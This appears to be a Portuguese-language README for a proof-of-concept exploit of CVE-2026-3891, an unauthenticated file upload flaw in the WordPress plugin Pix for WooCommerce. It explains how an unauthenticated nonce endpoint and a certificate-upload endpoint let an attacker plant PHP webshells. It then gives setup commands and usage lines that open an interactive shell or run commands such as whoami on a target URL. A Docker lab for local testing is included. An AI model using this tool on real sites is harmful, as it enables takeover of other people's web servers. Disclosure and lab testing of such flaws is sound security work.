
Pix for WooCommerce <= 1.5.0 - Upload Arbitrário de Arquivos sem Autenticação (CVE-2026-3891) PoC
CVE-2026-3891 é uma vulnerabilidade de upload arbitrário de arquivo não autenticado no plugin WordPress Pix for WooCommerce. O plugin expõe um endpoint AJAX (lkn_pix_for_woocommerce_c6_save_settings) que aceita uploads de arquivos de certificado sem qualquer autenticação. Um nonce pode ser obtido sem autenticação por meio de um segundo endpoint exposto (lkn_pix_for_woocommerce_generate_nonce), permitindo que um atacante totalmente não autenticado envie arquivos arbitrários — incluindo webshells PHP — diretamente para a raiz web.
Versões afetadas: payment-gateway-pix-for-woocommerce <= 1.5.0
--commandgit clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2026-3891.py --url <TARGET_URL> [--command <CMD>] [--timeout <SECONDS>] [--useragent <UA>]
Explore o alvo e entre em uma sessão de shell interativa persistente para executar vários comandos.
python3 CVE-2026-3891.py --url 'https://target.com'

Execute um único comando no alvo e imprima a saída, útil para scripts ou verificações rápidas.
python3 CVE-2026-3891.py --url 'https://target.com' --command whoami
Comando único
Um ambiente Docker Compose autocontido com o software vulnerável para testes locais. Consulte DOCKER.md para mais detalhes
cd docker/
docker compose up -d
python3 CVE-2026-3891.py --url 'http://localhost:8080'
Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta.